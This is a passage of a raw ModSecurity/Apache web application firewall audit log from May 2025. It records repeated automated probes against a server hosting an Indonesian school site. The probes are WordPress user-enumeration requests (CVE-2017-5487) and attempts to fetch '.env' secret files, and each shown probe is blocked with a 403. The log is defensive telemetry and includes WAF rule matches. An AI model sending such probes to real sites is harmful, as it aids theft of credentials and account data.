103.236.140.4 8181 --8f46531a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 82.194.18.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.194.18.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8f46531a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f46531a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747026133928933 3449 (- - -) Stopwatch2: 1747026133928933 3449; combined=1471, p1=493, p2=947, p3=0, p4=0, p5=31, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f46531a-Z-- --350e0d20-A-- [12/May/2025:12:06:00 +0700] aCGBuOll0ld2l7Li0sdF2AAAAIA 103.236.140.4 54164 103.236.140.4 8181 --350e0d20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.220.112.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.220.112.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --350e0d20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --350e0d20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747026360476728 2490 (- - -) Stopwatch2: 1747026360476728 2490; combined=1193, p1=380, p2=784, p3=0, p4=0, p5=28, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --350e0d20-Z-- --b7861b09-A-- [12/May/2025:12:13:58 +0700] aCGDlhKpX3ymKhxxBshGzAAAAEU 103.236.140.4 54192 103.236.140.4 8181 --b7861b09-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Accept-Charset: utf-8 --b7861b09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7861b09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747026838637037 791 (- - -) Stopwatch2: 1747026838637037 791; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7861b09-Z-- --42dfa526-A-- [12/May/2025:13:03:08 +0700] aCGPHH4i-S7TW27OkGmBFAAAAMI 103.236.140.4 54496 103.236.140.4 8181 --42dfa526-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.223.132.86 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.223.132.86 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --42dfa526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42dfa526-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747029788022339 756 (- - -) Stopwatch2: 1747029788022339 756; combined=289, p1=258, p2=0, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42dfa526-Z-- --a9dfe91e-A-- [12/May/2025:14:13:54 +0700] aCGfshKpX3ymKhxxBshPcQAAAFY 103.236.140.4 46354 103.236.140.4 8181 --a9dfe91e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.205.107.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.205.107.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9dfe91e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9dfe91e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747034034826849 3306 (- - -) Stopwatch2: 1747034034826849 3306; combined=1470, p1=512, p2=900, p3=0, p4=0, p5=57, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9dfe91e-Z-- --3cb8ac70-A-- [12/May/2025:14:24:32 +0700] aCGiMOll0ld2l7Li0sdPnwAAAJY 103.236.140.4 46420 103.236.140.4 8181 --3cb8ac70-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 31.220.76.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.220.76.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3cb8ac70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cb8ac70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747034672023862 3667 (- - -) Stopwatch2: 1747034672023862 3667; combined=1626, p1=513, p2=1075, p3=0, p4=0, p5=38, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cb8ac70-Z-- --da5e4e76-A-- [12/May/2025:14:25:04 +0700] aCGiUBLjIumP119c9poUkwAAABQ 103.236.140.4 46450 103.236.140.4 8181 --da5e4e76-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 206.81.24.227 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 206.81.24.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --da5e4e76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da5e4e76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747034704246036 859 (- - -) Stopwatch2: 1747034704246036 859; combined=365, p1=330, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da5e4e76-Z-- --f61cae02-A-- [12/May/2025:14:27:21 +0700] aCGi2RLjIumP119c9poUlgAAAAA 103.236.140.4 46470 103.236.140.4 8181 --f61cae02-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f61cae02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f61cae02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747034841416301 886 (- - -) Stopwatch2: 1747034841416301 886; combined=338, p1=295, p2=0, p3=0, p4=0, p5=42, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f61cae02-Z-- --41de6a1f-A-- [12/May/2025:14:27:21 +0700] aCGi2ell0ld2l7Li0sdPpQAAAIk 103.236.140.4 46474 103.236.140.4 8181 --41de6a1f-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --41de6a1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41de6a1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747034841466925 720 (- - -) Stopwatch2: 1747034841466925 720; combined=261, p1=226, p2=0, p3=0, p4=0, p5=34, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41de6a1f-Z-- --893b813c-A-- [12/May/2025:14:27:21 +0700] aCGi2X4i-S7TW27OkGmLqAAAANQ 103.236.140.4 46478 103.236.140.4 8181 --893b813c-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --893b813c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --893b813c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747034841557037 790 (- - -) Stopwatch2: 1747034841557037 790; combined=345, p1=307, p2=0, p3=0, p4=0, p5=38, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --893b813c-Z-- --08535f06-A-- [12/May/2025:14:28:08 +0700] aCGjCH4i-S7TW27OkGmLqQAAANU 103.236.140.4 46484 103.236.140.4 8181 --08535f06-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.147.186.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.147.186.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --08535f06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08535f06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747034888617476 3131 (- - -) Stopwatch2: 1747034888617476 3131; combined=1310, p1=444, p2=835, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08535f06-Z-- --46777217-A-- [12/May/2025:14:38:33 +0700] aCGleRLjIumP119c9poUowAAABU 103.236.140.4 46520 103.236.140.4 8181 --46777217-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.6.88.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.6.88.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --46777217-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46777217-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747035513359563 3471 (- - -) Stopwatch2: 1747035513359563 3471; combined=1453, p1=472, p2=949, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46777217-Z-- --73b55249-A-- [12/May/2025:15:01:02 +0700] aCGqvhLjIumP119c9poZZAAAAAc 103.236.140.4 50866 103.236.140.4 8181 --73b55249-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.48.159.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.48.159.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73b55249-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73b55249-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747036862093778 3135 (- - -) Stopwatch2: 1747036862093778 3135; combined=1397, p1=504, p2=856, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73b55249-Z-- --70458c55-A-- [12/May/2025:15:23:02 +0700] aCGv5hLjIumP119c9pojwwAAAAw 103.236.140.4 60856 103.236.140.4 8181 --70458c55-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --70458c55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70458c55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747038182518472 910 (- - -) Stopwatch2: 1747038182518472 910; combined=387, p1=351, p2=0, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70458c55-Z-- --6bbd4b78-A-- [12/May/2025:15:52:08 +0700] aCG2uBKpX3ymKhxxBshTJAAAAEQ 103.236.140.4 35292 103.236.140.4 8181 --6bbd4b78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.155.239.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.155.239.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6bbd4b78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bbd4b78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747039928412522 2912 (- - -) Stopwatch2: 1747039928412522 2912; combined=1302, p1=436, p2=836, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bbd4b78-Z-- --e31cf36b-A-- [12/May/2025:15:59:32 +0700] aCG4dBLjIumP119c9pomigAAAAg 103.236.140.4 35376 103.236.140.4 8181 --e31cf36b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.72.97.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.72.97.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e31cf36b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e31cf36b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747040372017521 3001 (- - -) Stopwatch2: 1747040372017521 3001; combined=1274, p1=446, p2=797, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e31cf36b-Z-- --05f7d802-A-- [12/May/2025:16:02:31 +0700] aCG5J34i-S7TW27OkGmR_QAAAMw 103.236.140.4 35392 103.236.140.4 8181 --05f7d802-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 YaBrowser/19.9.1.64 (beta) Yowser/2.5 Safari/537.36 Accept-Charset: utf-8 --05f7d802-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05f7d802-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747040551276526 869 (- - -) Stopwatch2: 1747040551276526 869; combined=336, p1=285, p2=0, p3=0, p4=0, p5=50, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05f7d802-Z-- --e8324856-A-- [12/May/2025:16:03:00 +0700] aCG5RH4i-S7TW27OkGmR_wAAANE 103.236.140.4 35396 103.236.140.4 8181 --e8324856-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.113.69.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.113.69.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e8324856-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8324856-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747040580017516 3062 (- - -) Stopwatch2: 1747040580017516 3062; combined=1374, p1=440, p2=838, p3=0, p4=0, p5=96, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8324856-Z-- --485c983a-A-- [12/May/2025:16:04:50 +0700] aCG5shLjIumP119c9pomjQAAAAY 103.236.140.4 35414 103.236.140.4 8181 